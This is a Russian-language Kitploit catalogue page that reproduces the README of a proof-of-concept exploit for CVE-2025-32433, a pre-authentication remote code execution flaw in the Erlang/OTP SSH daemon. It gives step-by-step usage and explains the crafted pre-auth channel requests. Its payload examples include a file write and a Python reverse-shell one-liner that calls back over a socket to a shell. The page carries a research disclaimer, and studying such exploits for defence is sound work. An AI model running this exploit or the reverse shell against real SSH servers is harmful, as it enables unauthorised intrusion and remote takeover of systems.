Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32433 — Эксплойт proof-of-concept для CVE-2025-32433 — RCE до аутентификации в SSH-демоне Erlang/OTP. Включает Python-скрипт для отправки специально сформированных запросов SSH-каналов и выполнения произвольных команд. | Kitploit
Инструменты/GitHubGitHub/mdusmandasthaheer/cve-2025-32433
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubmdusmandasthaheer/cve-2025-32433

CVE-2025-32433

Эксплойт proof-of-concept для CVE-2025-32433 — RCE до аутентификации в SSH-демоне Erlang/OTP. Включает Python-скрипт для отправки специально сформированных запросов SSH-каналов и выполнения произвольных команд.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
11 месяцев назадЕщё не проверено

CVE-2025-32433 – Уязвимость удаленного выполнения кода (RCE) в Erlang/OTP SSH

📌 Краткое описание

CVE-2025-32433 — это уязвимость удаленного выполнения кода (RCE), затрагивающая демон SSH в Erlang/OTP. Корневая причина — некорректная обработка предаутентификационных запросов SSH-канала, которые злоумышленник может сформировать для выполнения произвольных команд до аутентификации. Прилагаемый PoC демонстрирует отправку таких сформированных SSH-пакетов; по умолчанию он записывает /lab.txt на целевую систему, но может быть адаптирован для других команд.

⚠️ Отказ от ответственности: Этот репозиторий предназначен только для образовательных и исследовательских целей. Не используйте его против систем без явного разрешения.

🛠️ Использование

  1. Измените данные целевой системы в PoC-скрипте:
root@kitploit:~
HOST = "127.0.0.1"  # Target IP
PORT = 2222         # Target SSH port
  1. Запустите эксплойт:
root@kitploit:~
python3 cve-2025-32433.py

По умолчанию он создает /lab.txt с содержимым pwned. Измените полезную нагрузку в build_channel_request, чтобы выполнять собственные команды.

🧩 Примеры полезных нагрузок

root@kitploit:~
# Write a file
file:write_file("/lab.txt", <<"pwned">>).

Spawn a reverse shell

os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")

🔧 Как работает PoC (кратко)

  • Подключается к SSH-сервису и обменивается баннерами.
  • Отправляет сформированный SSH_MSG_KEXINIT, чтобы имитировать обычное рукопожатие.
  • Отправляет SSH_MSG_CHANNEL_OPEN и SSH_MSG_CHANNEL_REQUEST с полезной нагрузкой exec до аутентификации.
  • Если система уязвима, сервер выполняет переданную команду Erlang.

🙏 Благодарности

Обнаружение и описание: Matt Keeley (Platform Security). Спасибо ему за публикацию PoC и предоставленные подробности.

Ссылка на блог: https://platformsecurity.com/blog/CVE-2025-32433-poc

📚 Ссылки

  • Блог Matt Keeley
  • Бюллетени безопасности Erlang/OTP
  • Запись MITRE CVE
Скачать инструмент